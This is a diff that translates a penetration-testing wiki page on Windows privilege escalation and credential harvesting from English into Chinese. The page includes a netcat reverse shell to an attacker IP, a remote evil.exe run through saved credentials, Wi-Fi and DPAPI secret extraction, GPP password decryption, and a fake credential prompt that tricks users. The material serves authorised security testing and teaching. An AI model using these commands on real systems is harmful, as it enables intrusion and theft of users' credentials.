 Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
 ```
+### 防火墙规则
 
-### Firewall Rules
+[**查看此页面以获取与防火墙相关的命令**](../basic-cmd-for-pentesters.md#firewall) **（列出规则，创建规则，关闭，关闭...）**
 
-[**Check this page for Firewall related commands**](../basic-cmd-for-pentesters.md#firewall) **(list rules, create rules, turn off, turn off...)**
-
-More[ commands for network enumeration here](../basic-cmd-for-pentesters.md#network)
-
-### Windows Subsystem for Linux (wsl)
+更多[网络枚举命令在这里](../basic-cmd-for-pentesters.md#network)
 
+### Windows 子系统 for Linux (wsl)
 ```bash
 C:\Windows\System32\bash.exe
 C:\Windows\System32\wsl.exe
 ```
+二进制 `bash.exe` 也可以在 `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` 中找到。
 
-Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`
-
-If you get root user you can listen on any port (the first time you use `nc.exe` to listen on a port it will ask via GUI if `nc` should be allowed by the firewall).
-
+如果你获得了 root 用户权限，你可以在任何端口上监听（第一次使用 `nc.exe` 在端口上监听时，它会通过 GUI 询问是否允许 `nc` 通过防火墙）。
 ```bash
 wsl whoami
 ./ubuntun1604.exe config --default-user root
 wsl whoami
 wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
 ```
+要轻松以 root 身份启动 bash，您可以尝试 `--default-user root`
 
-To easily start bash as root, you can try `--default-user root`
+您可以在文件夹 `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` 中浏览 `WSL` 文件系统
 
-You can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`
-
-## Windows Credentials
-
-### Winlogon Credentials
+## Windows 凭据
 
+### Winlogon 凭据
 ```bash
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
 
@@ -815,77 +698,65 @@ reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDef
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword
 ```
+### 凭据管理器 / Windows Vault
 
-### Credentials manager / Windows vault
+来自 [https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault](https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault)\
+Windows Vault 存储用户在服务器、网站和其他程序的凭据，**Windows** 可以 **自动登录用户**。乍一看，这可能看起来像是用户可以存储他们的 Facebook 凭据、Twitter 凭据、Gmail 凭据等，以便他们通过浏览器自动登录。但事实并非如此。
 
-From [https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault](https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault)\
-The Windows Vault stores user credentials for servers, websites and other programs that **Windows** can **log in the users automaticall**y. At first instance, this might look like now users can store their Facebook credentials, Twitter credentials, Gmail credentials etc., so that they automatically log in via browsers. But it is not so.
+Windows Vault 存储 Windows 可以自动登录用户的凭据，这意味着任何 **需要凭据来访问资源**（服务器或网站）的 **Windows 应用程序都可以使用此凭据管理器**和 Windows Vault，并使用提供的凭据，而不是用户每次都输入用户名和密码。
 
-Windows Vault stores credentials that Windows can log in the users automatically, which means that any **Windows application that needs credentials to access a resource** (server or a website) **can make use of this Credential Manager** & Windows Vault and use the credentials supplied instead of users entering the username and password all the time.
-
-Unless the applications interact with Credential Manager, I don't think it is possible for them to use the credentials for a given resource. So, if your application wants to make use of the vault, it should somehow **communicate with the credential manager and request the credentials for that resource** from the default storage vault.
-
-Use the `cmdkey` to list the stored credentials on the machine.
+除非应用程序与凭据管理器交互，否则我认为它们不可能使用给定资源的凭据。因此，如果您的应用程序想要使用 Vault，它应该以某种方式 **与凭据管理器通信并请求该资源的凭据**，从默认存储 Vault 中获取。
 
+使用 `cmdkey` 列出机器上存储的凭据。
 ```bash
 cmdkey /list
 Currently stored credentials:
- Target: Domain:interactive=WORKGROUP\Administrator
- Type: Domain Password
- User: WORKGROUP\Administrator
+Target: Domain:interactive=WORKGROUP\Administrator
+Type: Domain Password
+User: WORKGROUP\Administrator
 ```
-
-Then you can use `runas` with the `/savecred` options in order to use the saved credentials. The following example is calling a remote binary via an SMB share.
-
+然后您可以使用 `runas` 和 `/savecred` 选项来使用保存的凭据。以下示例通过 SMB 共享调用远程二进制文件。
 ```bash
 runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
 ```
-
-Using `runas` with a provided set of credential.
-
+使用 `runas` 和提供的凭据。
 ```bash
 C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
 ```
-
-Note that mimikatz, lazagne, [credentialfileview](https://www.nirsoft.net/utils/credentials_file_view.html), [VaultPasswordView](https://www.nirsoft.net/utils/vault_password_view.html), or from [Empire Powershells module](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/dumpCredStore.ps1).
+注意，mimikatz、lazagne、[credentialfileview](https://www.nirsoft.net/utils/credentials_file_view.html)、[VaultPasswordView](https://www.nirsoft.net/utils/vault_password_view.html) 或来自 [Empire Powershells module](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/dumpCredStore.ps1)。
 
 ### DPAPI
 
-The **Data Protection API (DPAPI)** provides a method for symmetric encryption of data, predominantly used within the Windows operating system for the symmetric encryption of asymmetric private keys. This encryption leverages a user or system secret to significantly contribute to entropy.
+**数据保护 API (DPAPI)** 提供了一种对称加密数据的方法，主要用于 Windows 操作系统中对非对称私钥的对称加密。此加密利用用户或系统秘密显著增加熵。
 
-**DPAPI enables the encryption of keys through a symmetric key that is derived from the user's login secrets**. In scenarios involving system encryption, it utilizes the system's domain authentication secrets.
-
-Encrypted user RSA keys, by using DPAPI, are stored in the `%APPDATA%\Microsoft\Protect\{SID}` directory, where `{SID}` represents the user's [Security Identifier](https://en.wikipedia.org/wiki/Security_Identifier). **The DPAPI key, co-located with the master key that safeguards the user's private keys in the same file**, typically consists of 64 bytes of random data. (It's important to note that access to this directory is restricted, preventing listing its contents via the `dir` command in CMD, though it can be listed through PowerShell).
+**DPAPI 通过从用户的登录秘密派生的对称密钥来实现密钥的加密**。在涉及系统加密的场景中，它利用系统的域认证秘密。
 
+使用 DPAPI 加密的用户 RSA 密钥存储在 `%APPDATA%\Microsoft\Protect\{SID}` 目录中，其中 `{SID}` 代表用户的 [安全标识符](https://en.wikipedia.org/wiki/Security_Identifier)。**DPAPI 密钥与保护用户私钥的主密钥位于同一文件中**，通常由 64 字节的随机数据组成。（重要的是要注意，该目录的访问受到限制，无法通过 CMD 中的 `dir` 命令列出其内容，但可以通过 PowerShell 列出）。
 ```powershell
 Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
 Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\
 ```
+您可以使用 **mimikatz module** `dpapi::masterkey` 和适当的参数 (`/pvk` 或 `/rpc`) 来解密它。
 
-You can use **mimikatz module** `dpapi::masterkey` with the appropriate arguments (`/pvk` or `/rpc`) to decrypt it.
-
-The **credentials files protected by the master password** are usually located in:
-
+**受主密码保护的凭据文件** 通常位于：
 ```powershell
 dir C:\Users\username\AppData\Local\Microsoft\Credentials\
 dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
 Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
 Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
 ```
-
-You can use **mimikatz module** `dpapi::cred` with the appropiate `/masterkey` to decrypt.\
-You can **extract many DPAPI** **masterkeys** from **memory** with the `sekurlsa::dpapi` module (if you are root).
+您可以使用 **mimikatz module** `dpapi::cred` 和适当的 `/masterkey` 进行解密。\
+您可以使用 `sekurlsa::dpapi` 模块（如果您是 root）从 **memory** 中 **提取许多 DPAPI** **masterkeys**。
 
 {{#ref}}
 dpapi-extracting-passwords.md
 {{#endref}}
 
-### PowerShell Credentials
+### PowerShell 凭据
 
-**PowerShell credentials** are often used for **scripting** and automation tasks as a way to store encrypted credentials conveniently. The credentials are protected using **DPAPI**, which typically means they can only be decrypted by the same user on the same computer they were created on.
-
-To **decrypt** a PS credentials from the file containing it you can do:
+**PowerShell 凭据** 通常用于 **脚本** 和自动化任务，以便方便地存储加密凭据。这些凭据使用 **DPAPI** 进行保护，这通常意味着它们只能由在同一计算机上创建它们的同一用户解密。
 
+要从包含 PS 凭据的文件中 **解密** 凭据，您可以执行：
 ```powershell
 PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
 PS C:\> $credential.GetNetworkCredential().username
@@ -896,9 +767,7 @@ PS C:\htb> $credential.GetNetworkCredential().password
 
 JustAPWD!
 ```
-
 ### Wifi
-
 ```bash
 #List saved Wifi using
 netsh wlan show profile
@@ -907,165 +776,147 @@ netsh wlan show profile <SSID> key=clear
 #Oneliner to extract all wifi passwords
 cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*
 ```
+### 保存的 RDP 连接
 
-### Saved RDP Connections
-
-You can find them on `HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\`\
-and in `HKCU\Software\Microsoft\Terminal Server Client\Servers\`
-
-### Recently Run Commands
+您可以在 `HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\`\
+和 `HKCU\Software\Microsoft\Terminal Server Client\Servers\` 中找到它们。
 
+### 最近运行的命令
 ```
 HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
 HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
 ```
-
-### **Remote Desktop Credential Manager**
-
+### **远程桌面凭据管理器**
 ```
 %localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
 ```
+使用 **Mimikatz** `dpapi::rdg` 模块和适当的 `/masterkey` 来 **解密任何 .rdg 文件**\
+您可以使用 Mimikatz `sekurlsa::dpapi` 模块 **从内存中提取许多 DPAPI 主密钥**。
 
-Use the **Mimikatz** `dpapi::rdg` module with appropriate `/masterkey` to **decrypt any .rdg files**\
-You can **extract many DPAPI masterkeys** from memory with the Mimikatz `sekurlsa::dpapi` module
+### 便签
 
-### Sticky Notes
-
-People often use the StickyNotes app on Windows workstations to **save passwords** and other information, not realizing it is a database file. This file is located at `C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` and is always worth searching for and examining.
+人们常常在 Windows 工作站上使用便签应用程序来 **保存密码** 和其他信息，而没有意识到它是一个数据库文件。该文件位于 `C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite`，始终值得搜索和检查。
 
 ### AppCmd.exe
 
-**Note that to recover passwords from AppCmd.exe you need to be Administrator and run under a High Integrity level.**\
-**AppCmd.exe** is located in the `%systemroot%\system32\inetsrv\` directory.\
-If this file exists then it is possible that some **credentials** have been configured and can be **recovered**.
-
-This code was extracted from [**PowerUP**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1):
+**请注意，要从 AppCmd.exe 恢复密码，您需要是管理员并在高完整性级别下运行。**\
+**AppCmd.exe** 位于 `%systemroot%\system32\inetsrv\` 目录中。\
+如果该文件存在，则可能已经配置了一些 **凭据** 并可以 **恢复**。
 
+此代码摘自 [**PowerUP**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1)：
 ```bash
 function Get-ApplicationHost {
-    $OrigError = $ErrorActionPreference
-    $ErrorActionPreference = "SilentlyContinue"
+$OrigError = $ErrorActionPreference
+$ErrorActionPreference = "SilentlyContinue"
 
-    # Check if appcmd.exe exists
-    if (Test-Path  ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
-        # Create data table to house results
-        $DataTable = New-Object System.Data.DataTable
+# Check if appcmd.exe exists
+if (Test-Path  ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
+# Create data table to house results
+$DataTable = New-Object System.Data.DataTable
 
-        # Create and name columns in the data table
-        $Null = $DataTable.Columns.Add("user")
-        $Null = $DataTable.Columns.Add("pass")
-        $Null = $DataTable.Columns.Add("type")
-        $Null = $DataTable.Columns.Add("vdir")
-        $Null = $DataTable.Columns.Add("apppool")
+# Create and name columns in the data table
+$Null = $DataTable.Columns.Add("user")
+$Null = $DataTable.Columns.Add("pass")
+$Null = $DataTable.Columns.Add("type")
+$Null = $DataTable.Columns.Add("vdir")
+$Null = $DataTable.Columns.Add("apppool")
 
-        # Get list of application pools
-        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
+# Get list of application pools
+Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
 
-            # Get application pool name
-            $PoolName = $_
+# Get application pool name
+$PoolName = $_
 
-            # Get username
-            $PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
-            $PoolUser = Invoke-Expression $PoolUserCmd
+# Get username
+$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
+$PoolUser = Invoke-Expression $PoolUserCmd
 
-            # Get password
-            $PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
-            $PoolPassword = Invoke-Expression $PoolPasswordCmd
+# Get password
+$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
+$PoolPassword = Invoke-Expression $PoolPasswordCmd
 
-            # Check if credentials exists
-            if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
-                # Add credentials to database
-                $Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
-            }
-        }
+# Check if credentials exists
+if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
+# Add credentials to database
+$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
+}
+}
 
-        # Get list of virtual directories
-        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {
+# Get list of virtual directories
+Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {
 
-            # Get Virtual Directory Name
-            $VdirName = $_
+# Get Virtual Directory Name
+$VdirName = $_
 
-            # Get username
-            $VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
-            $VdirUser = Invoke-Expression $VdirUserCmd
+# Get username
+$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
+$VdirUser = Invoke-Expression $VdirUserCmd
 
-            # Get password
-            $VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
-            $VdirPassword = Invoke-Expression $VdirPasswordCmd
+# Get password
+$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
+$VdirPassword = Invoke-Expression $VdirPasswordCmd
 
-            # Check if credentials exists
-            if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
-                # Add credentials to database
-                $Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
-            }
-        }
+# Check if credentials exists
+if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
+# Add credentials to database
+$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
+}
+}
 
-        # Check if any passwords were found
-        if( $DataTable.rows.Count -gt 0 ) {
-            # Display results in list view that can feed into the pipeline
-            $DataTable |  Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
-        }
-        else {
-            # Status user
-            Write-Verbose 'No application pool or virtual directory passwords were found.'
-            $False
-        }
-    }
-    else {
-        Write-Verbose 'Appcmd.exe does not exist in the default location.'
-        $False
-    }
-    $ErrorActionPreference = $OrigError
+# Check if any passwords were found
+if( $DataTable.rows.Count -gt 0 ) {
+# Display results in list view that can feed into the pipeline
+$DataTable |  Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
+}
+else {
+# Status user
+Write-Verbose 'No application pool or virtual directory passwords were found.'
+$False
+}
+}
+else {
+Write-Verbose 'Appcmd.exe does not exist in the default location.'
+$False
+}
+$ErrorActionPreference = $OrigError
 }
 ```
-
 ### SCClient / SCCM
 
-Check if `C:\Windows\CCM\SCClient.exe` exists .\
-Installers are **run with SYSTEM privileges**, many are vulnerable to **DLL Sideloading (Info from** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**).**
-
+检查 `C:\Windows\CCM\SCClient.exe` 是否存在。\
+安装程序以 **SYSTEM 权限** 运行，许多程序易受 **DLL 侧载攻击（信息来自** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**）。**
 ```bash
 $result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
 if ($result) { $result }
 else { Write "Not Installed." }
 ```
+## 文件和注册表 (凭据)
 
-## Files and Registry (Credentials)
-
-### Putty Creds
-
+### Putty 凭据
 ```bash
 reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
 ```
-
-### Putty SSH Host Keys
-
+### Putty SSH 主机密钥
 ```
 reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\
 ```
+### SSH 密钥在注册表中
 
-### SSH keys in registry
-
-SSH private keys can be stored inside the registry key `HKCU\Software\OpenSSH\Agent\Keys` so you should check if there is anything interesting in there:
-
+SSH 私钥可以存储在注册表键 `HKCU\Software\OpenSSH\Agent\Keys` 中，因此您应该检查那里是否有任何有趣的内容：
 ```bash
 reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'
 ```
+如果您在该路径中找到任何条目，它可能是一个保存的 SSH 密钥。它是加密存储的，但可以使用 [https://github.com/ropnop/windows_sshagent_extract](https://github.com/ropnop/windows_sshagent_extract) 容易地解密。\
+有关此技术的更多信息，请参见：[https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/)
 
-If you find any entry inside that path it will probably be a saved SSH key. It is stored encrypted but can be easily decrypted using [https://github.com/ropnop/windows_sshagent_extract](https://github.com/ropnop/windows_sshagent_extract).\
-More information about this technique here: [https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/)
-
-If `ssh-agent` service is not running and you want it to automatically start on boot run:
-
+如果 `ssh-agent` 服务未运行，并且您希望它在启动时自动启动，请运行：
 ```bash
 Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service
 ```
-
 > [!NOTE]
-> It looks like this technique isn't valid anymore. I tried to create some ssh keys, add them with `ssh-add` and login via ssh to a machine. The registry HKCU\Software\OpenSSH\Agent\Keys doesn't exist and procmon didn't identify the use of `dpapi.dll` during the asymmetric key authentication.
-
-### Unattended files
+> 看起来这个技术已经不再有效。我尝试创建一些ssh密钥，使用`ssh-add`添加它们，并通过ssh登录到一台机器。注册表HKCU\Software\OpenSSH\Agent\Keys不存在，procmon在非对称密钥认证期间没有识别到`dpapi.dll`的使用。
 
+### 无人值守文件
 ```
 C:\Windows\sysprep\sysprep.xml
 C:\Windows\sysprep\sysprep.inf
@@ -1080,32 +931,28 @@ C:\unattend.txt
 C:\unattend.inf
 dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
 ```
+您还可以使用 **metasploit** 搜索这些文件： _post/windows/gather/enum_unattend_
 
-You can also search for these files using **metasploit**: _post/windows/gather/enum_unattend_
-
-Example content:
-
+示例内容：
 ```xml
 <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
-    <AutoLogon>
-     <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
-     <Enabled>true</Enabled>
-     <Username>Administrateur</Username>
-    </AutoLogon>
+<AutoLogon>
+<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
+<Enabled>true</Enabled>
+<Username>Administrateur</Username>
+</AutoLogon>
 
-    <UserAccounts>
-     <LocalAccounts>
-      <LocalAccount wcm:action="add">
-       <Password>*SENSITIVE*DATA*DELETED*</Password>
-       <Group>administrators;users</Group>
-       <Name>Administrateur</Name>
-      </LocalAccount>
-     </LocalAccounts>
-    </UserAccounts>
+<UserAccounts>
+<LocalAccounts>
+<LocalAccount wcm:action="add">
+<Password>*SENSITIVE*DATA*DELETED*</Password>
+<Group>administrators;users</Group>
+<Name>Administrateur</Name>
+</LocalAccount>
+</LocalAccounts>
+</UserAccounts>
 ```
-
-### SAM & SYSTEM backups
-
+### SAM & SYSTEM 备份
 ```bash
 # Usually %SYSTEMROOT% = C:\Windows
 %SYSTEMROOT%\repair\SAM
@@ -1115,9 +962,7 @@ Example content:
 %SYSTEMROOT%\System32\config\SYSTEM
 %SYSTEMROOT%\System32\config\RegBack\system
 ```
-
-### Cloud Credentials
-
+### 云凭证
 ```bash
 #From user home
 .aws\credentials
@@ -1127,18 +972,17 @@ AppData\Roaming\gcloud\access_tokens.db
 .azure\accessTokens.json
 .azure\azureProfile.json
 ```
-
 ### McAfee SiteList.xml
 
-Search for a file called **SiteList.xml**
+搜索名为 **SiteList.xml** 的文件
 
 ### Cached GPP Pasword
 
-A feature was previously available that allowed the deployment of custom local administrator accounts on a group of machines via Group Policy Preferences (GPP). However, this method had significant security flaws. Firstly, the Group Policy Objects (GPOs), stored as XML files in SYSVOL, could be accessed by any domain user. Secondly, the passwords within these GPPs, encrypted with AES256 using a publicly documented default key, could be decrypted by any authenticated user. This posed a serious risk, as it could allow users to gain elevated privileges.
+之前有一个功能，允许通过组策略首选项（GPP）在一组机器上部署自定义本地管理员帐户。然而，这种方法存在重大安全缺陷。首先，存储在 SYSVOL 中的组策略对象（GPO）作为 XML 文件，可以被任何域用户访问。其次，这些 GPP 中的密码使用公开文档的默认密钥以 AES256 加密，任何经过身份验证的用户都可以解密。这构成了严重风险，因为这可能允许用户获得提升的权限。
 
-To mitigate this risk, a function was developed to scan for locally cached GPP files containing a "cpassword" field that is not empty. Upon finding such a file, the function decrypts the password and returns a custom PowerShell object. This object includes details about the GPP and the file's location, aiding in the identification and remediation of this security vulnerability.
+为了减轻这一风险，开发了一个功能，用于扫描包含非空 "cpassword" 字段的本地缓存 GPP 文件。找到此类文件后，该功能解密密码并返回一个自定义 PowerShell 对象。该对象包括有关 GPP 和文件位置的详细信息，有助于识别和修复此安全漏洞。
 
-Search in `C:\ProgramData\Microsoft\Group Policy\history` or in _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (previous to W Vista)_ for these files:
+在 `C:\ProgramData\Microsoft\Group Policy\history` 或 _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history**（在 W Vista 之前）_ 中搜索这些文件：
 
 - Groups.xml
 - Services.xml
@@ -1147,21 +991,16 @@ Search in `C:\ProgramData\Microsoft\Group Policy\history` or in _**C:\Documents
 - Printers.xml
 - Drives.xml
 
-**To decrypt the cPassword:**
-
+**要解密 cPassword：**
 ```bash
 #To decrypt these passwords you can decrypt it using
 gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
 ```
-
-Using crackmapexec to get the passwords:
-
+使用 crackmapexec 获取密码：
 ```bash
 crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
 ```
-
 ### IIS Web Config
-
 ```powershell
 Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
 ```
@@ -1175,21 +1014,17 @@ C:\inetpub\wwwroot\web.config
 Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
 Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
 ```
-
-Example of web.config with credentials:
-
+包含凭据的 web.config 示例：
 ```xml
 <authentication mode="Forms">
-    <forms name="login" loginUrl="/admin">
-        <credentials passwordFormat = "Clear">
-            <user name="Administrator" password="SuperAdminPassword" />
-        </credentials>
-    </forms>
+<forms name="login" loginUrl="/admin">
+<credentials passwordFormat = "Clear">
+<user name="Administrator" password="SuperAdminPassword" />
+</credentials>
+</forms>
 </authentication>
 ```
-
-### OpenVPN credentials
-
+### OpenVPN 凭据
 ```csharp
 Add-Type -AssemblyName System.Security
 $keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
@@ -1197,21 +1032,19 @@ $items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}
 
 foreach ($item in $items)
 {
-  $encryptedbytes=$item.'auth-data'
-  $entropy=$item.'entropy'
-  $entropy=$entropy[0..(($entropy.Length)-2)]
+$encryptedbytes=$item.'auth-data'
+$entropy=$item.'entropy'
+$entropy=$entropy[0..(($entropy.Length)-2)]
 
-  $decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
-    $encryptedBytes,
-    $entropy,
-    [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
+$encryptedBytes,
+$entropy,
+[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
 
-  Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
+Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
 }
 ```
-
-### Logs
-
+### 日志
 ```bash
 # IIS
 C:\inetpub\logs\LogFiles\*
@@ -1219,11 +1052,9 @@ C:\inetpub\logs\LogFiles\*
 #Apache
 Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
 ```
+### 请求凭据
 
-### Ask for credentials
-
-You can always **ask the user to enter his credentials of even the credentials of a different user** if you think he can know them (notice that **asking** the client directly for the **credentials** is really **risky**):
-
+您可以始终**要求用户输入他的凭据或其他用户的凭据**，如果您认为他可能知道这些凭据（请注意，**直接向客户请求** **凭据**是非常**危险**的）：
 ```bash
 $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
 $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password
@@ -1231,11 +1062,9 @@ $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::U
 #Get plaintext
 $cred.GetNetworkCredential() | fl
 ```
+### **可能包含凭据的文件名**
 
-### **Possible filenames containing credentials**
-
-Known files that some time ago contained **passwords** in **clear-text** or **Base64**
-
+已知文件，之前包含**明文**或**Base64**的**密码**
 ```bash
 $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
 vnc.ini, ultravnc.ini, *vnc*
@@ -1299,9 +1128,7 @@ TypedURLs       #IE
 %USERPROFILE%\ntuser.dat
 %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
 ```
-
-Search all of the proposed files:
-
+搜索所有提议的文件：
 ```
 cd C:\
 dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"
@@ -1310,141 +1137,127 @@ dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd
 ```
